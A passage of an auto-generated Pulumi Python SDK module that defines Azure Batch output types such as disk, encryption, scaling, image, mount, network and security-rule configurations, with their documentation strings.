pulumi.set(__self__, "storage_account_type", storage_account_type)
@property
@pulumi.getter(name="diskSizeGB")
def disk_size_gb(self) -> int:
return pulumi.get(self, "disk_size_gb")
@property
@pulumi.getter
def lun(self) -> int:
"""
The lun is used to uniquely identify each data disk. If attaching multiple disks, each should have a distinct lun. The value must be between 0 and 63, inclusive.
"""
return pulumi.get(self, "lun")
@property
@pulumi.getter
def caching(self) -> Optional[str]:
"""
Values are:
none - The caching mode for the disk is not enabled.
readOnly - The caching mode for the disk is read only.
readWrite - The caching mode for the disk is read and write.
The default value for caching is none. For information about the caching options see: https://blogs.msdn.microsoft.com/windowsazurestorage/2012/06/27/exploring-windows-azure-drives-disks-and-images/.
"""
return pulumi.get(self, "caching")
@property
@pulumi.getter(name="storageAccountType")
def storage_account_type(self) -> Optional[str]:
"""
If omitted, the default is "Standard_LRS". Values are:
Standard_LRS - The data disk should use standard locally redundant storage.
Premium_LRS - The data disk should use premium locally redundant storage.
"""
return pulumi.get(self, "storage_account_type")
@pulumi.output_type
class DeleteCertificateErrorResponse(dict):
"""
An error response from the Batch service.
"""
def __init__(__self__, *,
code: str,
message: str,
details: Optional[Sequence['outputs.DeleteCertificateErrorResponse']] = None,
target: Optional[str] = None):
"""
An error response from the Batch service.
:param str code: An identifier for the error. Codes are invariant and are intended to be consumed programmatically.
:param str message: A message describing the error, intended to be suitable for display in a user interface.
:param Sequence['DeleteCertificateErrorResponse'] details: A list of additional details about the error.
:param str target: The target of the particular error. For example, the name of the property in error.
"""
pulumi.set(__self__, "code", code)
pulumi.set(__self__, "message", message)
if details is not None:
pulumi.set(__self__, "details", details)
if target is not None:
pulumi.set(__self__, "target", target)
@property
@pulumi.getter
def code(self) -> str:
"""
An identifier for the error. Codes are invariant and are intended to be consumed programmatically.
"""
return pulumi.get(self, "code")
@property
@pulumi.getter
def message(self) -> str:
"""
A message describing the error, intended to be suitable for display in a user interface.
"""
return pulumi.get(self, "message")
@property
@pulumi.getter
def details(self) -> Optional[Sequence['outputs.DeleteCertificateErrorResponse']]:
"""
A list of additional details about the error.
"""
return pulumi.get(self, "details")
@property
@pulumi.getter
def target(self) -> Optional[str]:
"""
The target of the particular error. For example, the name of the property in error.
"""
return pulumi.get(self, "target")
@pulumi.output_type
class DeploymentConfigurationResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "cloudServiceConfiguration":
suggest = "cloud_service_configuration"
elif key == "virtualMachineConfiguration":
suggest = "virtual_machine_configuration"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DeploymentConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DeploymentConfigurationResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DeploymentConfigurationResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
cloud_service_configuration: Optional['outputs.CloudServiceConfigurationResponse'] = None,
virtual_machine_configuration: Optional['outputs.VirtualMachineConfigurationResponse'] = None):
"""
:param 'CloudServiceConfigurationResponse' cloud_service_configuration: This property and virtualMachineConfiguration are mutually exclusive and one of the properties must be specified. This property cannot be specified if the Batch account was created with its poolAllocationMode property set to 'UserSubscription'.
:param 'VirtualMachineConfigurationResponse' virtual_machine_configuration: This property and cloudServiceConfiguration are mutually exclusive and one of the properties must be specified.
"""
if cloud_service_configuration is not None:
pulumi.set(__self__, "cloud_service_configuration", cloud_service_configuration)
if virtual_machine_configuration is not None:
pulumi.set(__self__, "virtual_machine_configuration", virtual_machine_configuration)
@property
@pulumi.getter(name="cloudServiceConfiguration")
def cloud_service_configuration(self) -> Optional['outputs.CloudServiceConfigurationResponse']:
"""
This property and virtualMachineConfiguration are mutually exclusive and one of the properties must be specified. This property cannot be specified if the Batch account was created with its poolAllocationMode property set to 'UserSubscription'.
"""
return pulumi.get(self, "cloud_service_configuration")
@property
@pulumi.getter(name="virtualMachineConfiguration")
def virtual_machine_configuration(self) -> Optional['outputs.VirtualMachineConfigurationResponse']:
"""
This property and cloudServiceConfiguration are mutually exclusive and one of the properties must be specified.
"""
return pulumi.get(self, "virtual_machine_configuration")
@pulumi.output_type
class DiskEncryptionConfigurationResponse(dict):
"""
The disk encryption configuration applied on compute nodes in the pool. Disk encryption configuration is not supported on Linux pool created with Virtual Machine Image or Shared Image Gallery Image.
"""
def __init__(__self__, *,
targets: Optional[Sequence[str]] = None):
"""
The disk encryption configuration applied on compute nodes in the pool. Disk encryption configuration is not supported on Linux pool created with Virtual Machine Image or Shared Image Gallery Image.
:param Sequence[str] targets: On Linux pool, only "TemporaryDisk" is supported; on Windows pool, "OsDisk" and "TemporaryDisk" must be specified.
"""
if targets is not None:
pulumi.set(__self__, "targets", targets)
@property
@pulumi.getter
def targets(self) -> Optional[Sequence[str]]:
"""
On Linux pool, only "TemporaryDisk" is supported; on Windows pool, "OsDisk" and "TemporaryDisk" must be specified.
"""
return pulumi.get(self, "targets")
@pulumi.output_type
class EncryptionPropertiesResponse(dict):
"""
Configures how customer data is encrypted inside the Batch account. By default, accounts are encrypted using a Microsoft managed key. For additional control, a customer-managed key can be used instead.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "keySource":
suggest = "key_source"
elif key == "keyVaultProperties":
suggest = "key_vault_properties"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in EncryptionPropertiesResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
EncryptionPropertiesResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
EncryptionPropertiesResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
key_source: Optional[str] = None,
key_vault_properties: Optional['outputs.KeyVaultPropertiesResponse'] = None):
"""
Configures how customer data is encrypted inside the Batch account. By default, accounts are encrypted using a Microsoft managed key. For additional control, a customer-managed key can be used instead.
:param str key_source: Type of the key source.
:param 'KeyVaultPropertiesResponse' key_vault_properties: Additional details when using Microsoft.KeyVault
"""
if key_source is not None:
pulumi.set(__self__, "key_source", key_source)
if key_vault_properties is not None:
pulumi.set(__self__, "key_vault_properties", key_vault_properties)
@property
@pulumi.getter(name="keySource")
def key_source(self) -> Optional[str]:
"""
Type of the key source.
"""
return pulumi.get(self, "key_source")
@property
@pulumi.getter(name="keyVaultProperties")
def key_vault_properties(self) -> Optional['outputs.KeyVaultPropertiesResponse']:
"""
Additional details when using Microsoft.KeyVault
"""
return pulumi.get(self, "key_vault_properties")
@pulumi.output_type
class EnvironmentSettingResponse(dict):
def __init__(__self__, *,
name: str,
value: Optional[str] = None):
pulumi.set(__self__, "name", name)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter
def value(self) -> Optional[str]:
return pulumi.get(self, "value")
@pulumi.output_type
class FixedScaleSettingsResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "nodeDeallocationOption":
suggest = "node_deallocation_option"
elif key == "resizeTimeout":
suggest = "resize_timeout"
elif key == "targetDedicatedNodes":
suggest = "target_dedicated_nodes"
elif key == "targetLowPriorityNodes":
suggest = "target_low_priority_nodes"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in FixedScaleSettingsResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
FixedScaleSettingsResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
FixedScaleSettingsResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
node_deallocation_option: Optional[str] = None,
resize_timeout: Optional[str] = None,
target_dedicated_nodes: Optional[int] = None,
target_low_priority_nodes: Optional[int] = None):
"""
:param str node_deallocation_option: If omitted, the default value is Requeue.
:param str resize_timeout: The default value is 15 minutes. Timeout values use ISO 8601 format. For example, use PT10M for 10 minutes. The minimum value is 5 minutes. If you specify a value less than 5 minutes, the Batch service rejects the request with an error; if you are calling the REST API directly, the HTTP status code is 400 (Bad Request).
:param int target_dedicated_nodes: At least one of targetDedicatedNodes, targetLowPriorityNodes must be set.
:param int target_low_priority_nodes: At least one of targetDedicatedNodes, targetLowPriorityNodes must be set.
"""
if node_deallocation_option is not None:
pulumi.set(__self__, "node_deallocation_option", node_deallocation_option)
if resize_timeout is not None:
pulumi.set(__self__, "resize_timeout", resize_timeout)
if target_dedicated_nodes is not None:
pulumi.set(__self__, "target_dedicated_nodes", target_dedicated_nodes)
if target_low_priority_nodes is not None:
pulumi.set(__self__, "target_low_priority_nodes", target_low_priority_nodes)
@property
@pulumi.getter(name="nodeDeallocationOption")
def node_deallocation_option(self) -> Optional[str]:
"""
If omitted, the default value is Requeue.
"""
return pulumi.get(self, "node_deallocation_option")
@property
@pulumi.getter(name="resizeTimeout")
def resize_timeout(self) -> Optional[str]:
"""
The default value is 15 minutes. Timeout values use ISO 8601 format. For example, use PT10M for 10 minutes. The minimum value is 5 minutes. If you specify a value less than 5 minutes, the Batch service rejects the request with an error; if you are calling the REST API directly, the HTTP status code is 400 (Bad Request).
"""
return pulumi.get(self, "resize_timeout")
@property
@pulumi.getter(name="targetDedicatedNodes")
def target_dedicated_nodes(self) -> Optional[int]:
"""
At least one of targetDedicatedNodes, targetLowPriorityNodes must be set.
"""
return pulumi.get(self, "target_dedicated_nodes")
@property
@pulumi.getter(name="targetLowPriorityNodes")
def target_low_priority_nodes(self) -> Optional[int]:
"""
At least one of targetDedicatedNodes, targetLowPriorityNodes must be set.
"""
return pulumi.get(self, "target_low_priority_nodes")
@pulumi.output_type
class ImageReferenceResponse(dict):
def __init__(__self__, *,
id: Optional[str] = None,
offer: Optional[str] = None,
publisher: Optional[str] = None,
sku: Optional[str] = None,
version: Optional[str] = None):
"""
:param str id: This property is mutually exclusive with other properties. The Shared Image Gallery image must have replicas in the same region as the Azure Batch account. For information about the firewall settings for the Batch node agent to communicate with the Batch service see https://docs.microsoft.com/en-us/azure/batch/batch-api-basics#virtual-network-vnet-and-firewall-configuration.
:param str offer: For example, UbuntuServer or WindowsServer.
:param str publisher: For example, Canonical or MicrosoftWindowsServer.
:param str sku: For example, 18.04-LTS or 2019-Datacenter.
:param str version: A value of 'latest' can be specified to select the latest version of an image. If omitted, the default is 'latest'.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if offer is not None:
pulumi.set(__self__, "offer", offer)
if publisher is not None:
pulumi.set(__self__, "publisher", publisher)
if sku is not None:
pulumi.set(__self__, "sku", sku)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
This property is mutually exclusive with other properties. The Shared Image Gallery image must have replicas in the same region as the Azure Batch account. For information about the firewall settings for the Batch node agent to communicate with the Batch service see https://docs.microsoft.com/en-us/azure/batch/batch-api-basics#virtual-network-vnet-and-firewall-configuration.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def offer(self) -> Optional[str]:
"""
For example, UbuntuServer or WindowsServer.
"""
return pulumi.get(self, "offer")
@property
@pulumi.getter
def publisher(self) -> Optional[str]:
"""
For example, Canonical or MicrosoftWindowsServer.
"""
return pulumi.get(self, "publisher")
@property
@pulumi.getter
def sku(self) -> Optional[str]:
"""
For example, 18.04-LTS or 2019-Datacenter.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def version(self) -> Optional[str]:
"""
A value of 'latest' can be specified to select the latest version of an image. If omitted, the default is 'latest'.
"""
return pulumi.get(self, "version")
@pulumi.output_type
class InboundNatPoolResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "backendPort":
suggest = "backend_port"
elif key == "frontendPortRangeEnd":
suggest = "frontend_port_range_end"
elif key == "frontendPortRangeStart":
suggest = "frontend_port_range_start"
elif key == "networkSecurityGroupRules":
suggest = "network_security_group_rules"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in InboundNatPoolResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
InboundNatPoolResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
InboundNatPoolResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
backend_port: int,
frontend_port_range_end: int,
frontend_port_range_start: int,
name: str,
protocol: str,
network_security_group_rules: Optional[Sequence['outputs.NetworkSecurityGroupRuleResponse']] = None):
"""
:param int backend_port: This must be unique within a Batch pool. Acceptable values are between 1 and 65535 except for 22, 3389, 29876 and 29877 as these are reserved. If any reserved values are provided the request fails with HTTP status code 400.
:param int frontend_port_range_end: Acceptable values range between 1 and 65534 except ports from 50000 to 55000 which are reserved by the Batch service. All ranges within a pool must be distinct and cannot overlap. If any reserved or overlapping values are provided the request fails with HTTP status code 400.
:param int frontend_port_range_start: Acceptable values range between 1 and 65534 except ports from 50000 to 55000 which are reserved. All ranges within a pool must be distinct and cannot overlap. If any reserved or overlapping values are provided the request fails with HTTP status code 400.
:param str name: The name must be unique within a Batch pool, can contain letters, numbers, underscores, periods, and hyphens. Names must start with a letter or number, must end with a letter, number, or underscore, and cannot exceed 77 characters. If any invalid values are provided the request fails with HTTP status code 400.
:param Sequence['NetworkSecurityGroupRuleResponse'] network_security_group_rules: The maximum number of rules that can be specified across all the endpoints on a Batch pool is 25. If no network security group rules are specified, a default rule will be created to allow inbound access to the specified backendPort. If the maximum number of network security group rules is exceeded the request fails with HTTP status code 400.
"""
pulumi.set(__self__, "backend_port", backend_port)
pulumi.set(__self__, "frontend_port_range_end", frontend_port_range_end)
pulumi.set(__self__, "frontend_port_range_start", frontend_port_range_start)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "protocol", protocol)
if network_security_group_rules is not None:
pulumi.set(__self__, "network_security_group_rules", network_security_group_rules)
@property
@pulumi.getter(name="backendPort")
def backend_port(self) -> int:
"""
This must be unique within a Batch pool. Acceptable values are between 1 and 65535 except for 22, 3389, 29876 and 29877 as these are reserved. If any reserved values are provided the request fails with HTTP status code 400.
"""
return pulumi.get(self, "backend_port")
@property
@pulumi.getter(name="frontendPortRangeEnd")
def frontend_port_range_end(self) -> int:
"""
Acceptable values range between 1 and 65534 except ports from 50000 to 55000 which are reserved by the Batch service. All ranges within a pool must be distinct and cannot overlap. If any reserved or overlapping values are provided the request fails with HTTP status code 400.
"""
return pulumi.get(self, "frontend_port_range_end")
@property
@pulumi.getter(name="frontendPortRangeStart")
def frontend_port_range_start(self) -> int:
"""
Acceptable values range between 1 and 65534 except ports from 50000 to 55000 which are reserved. All ranges within a pool must be distinct and cannot overlap. If any reserved or overlapping values are provided the request fails with HTTP status code 400.
"""
return pulumi.get(self, "frontend_port_range_start")
@property
@pulumi.getter
def name(self) -> str:
"""
The name must be unique within a Batch pool, can contain letters, numbers, underscores, periods, and hyphens. Names must start with a letter or number, must end with a letter, number, or underscore, and cannot exceed 77 characters. If any invalid values are provided the request fails with HTTP status code 400.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def protocol(self) -> str:
return pulumi.get(self, "protocol")
@property
@pulumi.getter(name="networkSecurityGroupRules")
def network_security_group_rules(self) -> Optional[Sequence['outputs.NetworkSecurityGroupRuleResponse']]:
"""
The maximum number of rules that can be specified across all the endpoints on a Batch pool is 25. If no network security group rules are specified, a default rule will be created to allow inbound access to the specified backendPort. If the maximum number of network security group rules is exceeded the request fails with HTTP status code 400.
"""
return pulumi.get(self, "network_security_group_rules")
@pulumi.output_type
class KeyVaultPropertiesResponse(dict):
"""
KeyVault configuration when using an encryption KeySource of Microsoft.KeyVault.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "keyIdentifier":
suggest = "key_identifier"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in KeyVaultPropertiesResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
KeyVaultPropertiesResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
KeyVaultPropertiesResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
key_identifier: Optional[str] = None):
"""
KeyVault configuration when using an encryption KeySource of Microsoft.KeyVault.
:param str key_identifier: Full path to the versioned secret. Example https://mykeyvault.vault.azure.net/keys/testkey/6e34a81fef704045975661e297a4c053. To be usable the following prerequisites must be met:
The Batch Account has a System Assigned identity
The account identity has been granted Key/Get, Key/Unwrap and Key/Wrap permissions
The KeyVault has soft-delete and purge protection enabled
"""
if key_identifier is not None:
pulumi.set(__self__, "key_identifier", key_identifier)
@property
@pulumi.getter(name="keyIdentifier")
def key_identifier(self) -> Optional[str]:
"""
Full path to the versioned secret. Example https://mykeyvault.vault.azure.net/keys/testkey/6e34a81fef704045975661e297a4c053. To be usable the following prerequisites must be met:
The Batch Account has a System Assigned identity
The account identity has been granted Key/Get, Key/Unwrap and Key/Wrap permissions
The KeyVault has soft-delete and purge protection enabled
"""
return pulumi.get(self, "key_identifier")
@pulumi.output_type
class KeyVaultReferenceResponse(dict):
"""
Identifies the Azure key vault associated with a Batch account.
"""
def __init__(__self__, *,
id: str,
url: str):
"""
Identifies the Azure key vault associated with a Batch account.
:param str id: The resource ID of the Azure key vault associated with the Batch account.
:param str url: The URL of the Azure key vault associated with the Batch account.
"""
pulumi.set(__self__, "id", id)
pulumi.set(__self__, "url", url)
@property
@pulumi.getter
def id(self) -> str:
"""
The resource ID of the Azure key vault associated with the Batch account.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def url(self) -> str:
"""
The URL of the Azure key vault associated with the Batch account.
"""
return pulumi.get(self, "url")
@pulumi.output_type
class LinuxUserConfigurationResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "sshPrivateKey":
suggest = "ssh_private_key"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in LinuxUserConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
LinuxUserConfigurationResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
LinuxUserConfigurationResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
gid: Optional[int] = None,
ssh_private_key: Optional[str] = None,
uid: Optional[int] = None):
"""
:param int gid: The uid and gid properties must be specified together or not at all. If not specified the underlying operating system picks the gid.
:param str ssh_private_key: The private key must not be password protected. The private key is used to automatically configure asymmetric-key based authentication for SSH between nodes in a Linux pool when the pool's enableInterNodeCommunication property is true (it is ignored if enableInterNodeCommunication is false). It does this by placing the key pair into the user's .ssh directory. If not specified, password-less SSH is not configured between nodes (no modification of the user's .ssh directory is done).
:param int uid: The uid and gid properties must be specified together or not at all. If not specified the underlying operating system picks the uid.
"""
if gid is not None:
pulumi.set(__self__, "gid", gid)
if ssh_private_key is not None:
pulumi.set(__self__, "ssh_private_key", ssh_private_key)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter
def gid(self) -> Optional[int]:
"""
The uid and gid properties must be specified together or not at all. If not specified the underlying operating system picks the gid.
"""
return pulumi.get(self, "gid")
@property
@pulumi.getter(name="sshPrivateKey")
def ssh_private_key(self) -> Optional[str]:
"""
The private key must not be password protected. The private key is used to automatically configure asymmetric-key based authentication for SSH between nodes in a Linux pool when the pool's enableInterNodeCommunication property is true (it is ignored if enableInterNodeCommunication is false). It does this by placing the key pair into the user's .ssh directory. If not specified, password-less SSH is not configured between nodes (no modification of the user's .ssh directory is done).
"""
return pulumi.get(self, "ssh_private_key")
@property
@pulumi.getter
def uid(self) -> Optional[int]:
"""
The uid and gid properties must be specified together or not at all. If not specified the underlying operating system picks the uid.
"""
return pulumi.get(self, "uid")
@pulumi.output_type
class MetadataItemResponse(dict):
"""
The Batch service does not assign any meaning to this metadata; it is solely for the use of user code.
"""
def __init__(__self__, *,
name: str,
value: str):
"""
The Batch service does not assign any meaning to this metadata; it is solely for the use of user code.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter
def value(self) -> str:
return pulumi.get(self, "value")
@pulumi.output_type
class MountConfigurationResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "azureBlobFileSystemConfiguration":
suggest = "azure_blob_file_system_configuration"
elif key == "azureFileShareConfiguration":
suggest = "azure_file_share_configuration"
elif key == "cifsMountConfiguration":
suggest = "cifs_mount_configuration"
elif key == "nfsMountConfiguration":
suggest = "nfs_mount_configuration"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in MountConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
MountConfigurationResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
MountConfigurationResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
azure_blob_file_system_configuration: Optional['outputs.AzureBlobFileSystemConfigurationResponse'] = None,
azure_file_share_configuration: Optional['outputs.AzureFileShareConfigurationResponse'] = None,
cifs_mount_configuration: Optional['outputs.CIFSMountConfigurationResponse'] = None,
nfs_mount_configuration: Optional['outputs.NFSMountConfigurationResponse'] = None):
"""
:param 'AzureBlobFileSystemConfigurationResponse' azure_blob_file_system_configuration: This property is mutually exclusive with all other properties.
:param 'AzureFileShareConfigurationResponse' azure_file_share_configuration: This property is mutually exclusive with all other properties.
:param 'CIFSMountConfigurationResponse' cifs_mount_configuration: This property is mutually exclusive with all other properties.
:param 'NFSMountConfigurationResponse' nfs_mount_configuration: This property is mutually exclusive with all other properties.
"""
if azure_blob_file_system_configuration is not None:
pulumi.set(__self__, "azure_blob_file_system_configuration", azure_blob_file_system_configuration)
if azure_file_share_configuration is not None:
pulumi.set(__self__, "azure_file_share_configuration", azure_file_share_configuration)
if cifs_mount_configuration is not None:
pulumi.set(__self__, "cifs_mount_configuration", cifs_mount_configuration)
if nfs_mount_configuration is not None:
pulumi.set(__self__, "nfs_mount_configuration", nfs_mount_configuration)
@property
@pulumi.getter(name="azureBlobFileSystemConfiguration")
def azure_blob_file_system_configuration(self) -> Optional['outputs.AzureBlobFileSystemConfigurationResponse']:
"""
This property is mutually exclusive with all other properties.
"""
return pulumi.get(self, "azure_blob_file_system_configuration")
@property
@pulumi.getter(name="azureFileShareConfiguration")
def azure_file_share_configuration(self) -> Optional['outputs.AzureFileShareConfigurationResponse']:
"""
This property is mutually exclusive with all other properties.
"""
return pulumi.get(self, "azure_file_share_configuration")
@property
@pulumi.getter(name="cifsMountConfiguration")
def cifs_mount_configuration(self) -> Optional['outputs.CIFSMountConfigurationResponse']:
"""
This property is mutually exclusive with all other properties.
"""
return pulumi.get(self, "cifs_mount_configuration")
@property
@pulumi.getter(name="nfsMountConfiguration")
def nfs_mount_configuration(self) -> Optional['outputs.NFSMountConfigurationResponse']:
"""
This property is mutually exclusive with all other properties.
"""
return pulumi.get(self, "nfs_mount_configuration")
@pulumi.output_type
class NFSMountConfigurationResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "relativeMountPath":
suggest = "relative_mount_path"
elif key == "mountOptions":
suggest = "mount_options"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in NFSMountConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
NFSMountConfigurationResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
NFSMountConfigurationResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
relative_mount_path: str,
source: str,
mount_options: Optional[str] = None):
"""
:param str relative_mount_path: All file systems are mounted relative to the Batch mounts directory, accessible via the AZ_BATCH_NODE_MOUNTS_DIR environment variable.
:param str mount_options: These are 'net use' options in Windows and 'mount' options in Linux.
"""
pulumi.set(__self__, "relative_mount_path", relative_mount_path)
pulumi.set(__self__, "source", source)
if mount_options is not None:
pulumi.set(__self__, "mount_options", mount_options)
@property
@pulumi.getter(name="relativeMountPath")
def relative_mount_path(self) -> str:
"""
All file systems are mounted relative to the Batch mounts directory, accessible via the AZ_BATCH_NODE_MOUNTS_DIR environment variable.
"""
return pulumi.get(self, "relative_mount_path")
@property
@pulumi.getter
def source(self) -> str:
return pulumi.get(self, "source")
@property
@pulumi.getter(name="mountOptions")
def mount_options(self) -> Optional[str]:
"""
These are 'net use' options in Windows and 'mount' options in Linux.
"""
return pulumi.get(self, "mount_options")
@pulumi.output_type
class NetworkConfigurationResponse(dict):
"""
The network configuration for a pool.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "endpointConfiguration":
suggest = "endpoint_configuration"
elif key == "publicIPAddressConfiguration":
suggest = "public_ip_address_configuration"
elif key == "subnetId":
suggest = "subnet_id"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in NetworkConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
NetworkConfigurationResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
NetworkConfigurationResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
endpoint_configuration: Optional['outputs.PoolEndpointConfigurationResponse'] = None,
public_ip_address_configuration: Optional['outputs.PublicIPAddressConfigurationResponse'] = None,
subnet_id: Optional[str] = None):
"""
The network configuration for a pool.
:param 'PoolEndpointConfigurationResponse' endpoint_configuration: Pool endpoint configuration is only supported on pools with the virtualMachineConfiguration property.
:param 'PublicIPAddressConfigurationResponse' public_ip_address_configuration: This property is only supported on Pools with the virtualMachineConfiguration property.
:param str subnet_id: The virtual network must be in the same region and subscription as the Azure Batch account. The specified subnet should have enough free IP addresses to accommodate the number of nodes in the pool. If the subnet doesn't have enough free IP addresses, the pool will partially allocate compute nodes and a resize error will occur. The 'MicrosoftAzureBatch' service principal must have the 'Classic Virtual Machine Contributor' Role-Based Access Control (RBAC) role for the specified VNet. The specified subnet must allow communication from the Azure Batch service to be able to schedule tasks on the compute nodes. This can be verified by checking if the specified VNet has any associated Network Security Groups (NSG). If communication to the compute nodes in the specified subnet is denied by an NSG, then the Batch service will set the state of the compute nodes to unusable. If the specified VNet has any associated Network Security Groups (NSG), then a few reserved system ports must be enabled for inbound communication. For pools created with a virtual machine configuration, enable ports 29876 and 29877, as well as port 22 for Linux and port 3389 for Windows. For pools created with a cloud service configuration, enable ports 10100, 20100, and 30100. Also enable outbound connections to Azure Storage on port 443. For cloudServiceConfiguration pools, only 'classic' VNETs are supported. For more details see: https://docs.microsoft.com/en-us/azure/batch/batch-api-basics#virtual-network-vnet-and-firewall-configuration
"""
if endpoint_configuration is not None:
pulumi.set(__self__, "endpoint_configuration", endpoint_configuration)
if public_ip_address_configuration is not None:
pulumi.set(__self__, "public_ip_address_configuration", public_ip_address_configuration)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
@property
@pulumi.getter(name="endpointConfiguration")
def endpoint_configuration(self) -> Optional['outputs.PoolEndpointConfigurationResponse']:
"""
Pool endpoint configuration is only supported on pools with the virtualMachineConfiguration property.
"""
return pulumi.get(self, "endpoint_configuration")
@property
@pulumi.getter(name="publicIPAddressConfiguration")
def public_ip_address_configuration(self) -> Optional['outputs.PublicIPAddressConfigurationResponse']:
"""
This property is only supported on Pools with the virtualMachineConfiguration property.
"""
return pulumi.get(self, "public_ip_address_configuration")
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[str]:
"""
The virtual network must be in the same region and subscription as the Azure Batch account. The specified subnet should have enough free IP addresses to accommodate the number of nodes in the pool. If the subnet doesn't have enough free IP addresses, the pool will partially allocate compute nodes and a resize error will occur. The 'MicrosoftAzureBatch' service principal must have the 'Classic Virtual Machine Contributor' Role-Based Access Control (RBAC) role for the specified VNet. The specified subnet must allow communication from the Azure Batch service to be able to schedule tasks on the compute nodes. This can be verified by checking if the specified VNet has any associated Network Security Groups (NSG). If communication to the compute nodes in the specified subnet is denied by an NSG, then the Batch service will set the state of the compute nodes to unusable. If the specified VNet has any associated Network Security Groups (NSG), then a few reserved system ports must be enabled for inbound communication. For pools created with a virtual machine configuration, enable ports 29876 and 29877, as well as port 22 for Linux and port 3389 for Windows. For pools created with a cloud service configuration, enable ports 10100, 20100, and 30100. Also enable outbound connections to Azure Storage on port 443. For cloudServiceConfiguration pools, only 'classic' VNETs are supported. For more details see: https://docs.microsoft.com/en-us/azure/batch/batch-api-basics#virtual-network-vnet-and-firewall-configuration
"""
return pulumi.get(self, "subnet_id")
@pulumi.output_type
class NetworkSecurityGroupRuleResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "sourceAddressPrefix":
suggest = "source_address_prefix"
elif key == "sourcePortRanges":
suggest = "source_port_ranges"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in NetworkSecurityGroupRuleResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
NetworkSecurityGroupRuleResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
NetworkSecurityGroupRuleResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
access: str,
priority: int,
source_address_prefix: str,
source_port_ranges: Optional[Sequence[str]] = None):
"""
:param int priority: Priorities within a pool must be unique and are evaluated in order of priority. The lower the number the higher the priority. For example, rules could be specified with order numbers of 150, 250, and 350. The rule with the order number of 150 takes precedence over the rule that has an order of 250. Allowed priorities are 150 to 4096. If any reserved or duplicate values are provided the request fails with HTTP status code 400.
:param str source_address_prefix: Valid values are a single IP address (i.e. 10.10.10.10), IP subnet (i.e. 192.168.1.0/24), default tag, or * (for all addresses). If any other values are provided the request fails with HTTP status code 400.
:param Sequence[str] source_port_ranges: Valid values are '*' (for all ports 0 - 65535) or arrays of ports or port ranges (i.e. 100-200). The ports should in the range of 0 to 65535 and the port ranges or ports can't overlap. If any other values are provided the request fails with HTTP status code 400. Default value will be *.
"""
